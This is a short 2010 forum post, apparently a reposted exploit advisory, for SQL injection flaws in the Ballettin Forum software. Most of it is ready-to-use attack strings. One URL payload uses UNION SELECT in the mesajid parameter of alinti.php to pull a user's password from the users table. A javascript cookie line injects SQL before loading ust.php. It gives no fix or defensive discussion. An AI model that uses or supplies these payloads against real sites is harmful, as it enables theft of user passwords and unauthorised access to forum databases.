begood Posted July 25, 2010 Report Posted July 25, 2010 ====================================================================# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability# Date: 25/07/2010# Author: 3v0 aka evolution <evolution ^ darkedition.com># Software Link: http://www.ballettin.com# Tested on: Windows Xp Pack 3====================================================================#1 - Vulnerable File------------------------------------------------------[+] File: http://www.site.com/alinti.php?mesajid=[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1#2 - Insecure Cookie------------------------------------------------------javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";After go to http://www.site.com/ust.php==================================================================== Quote
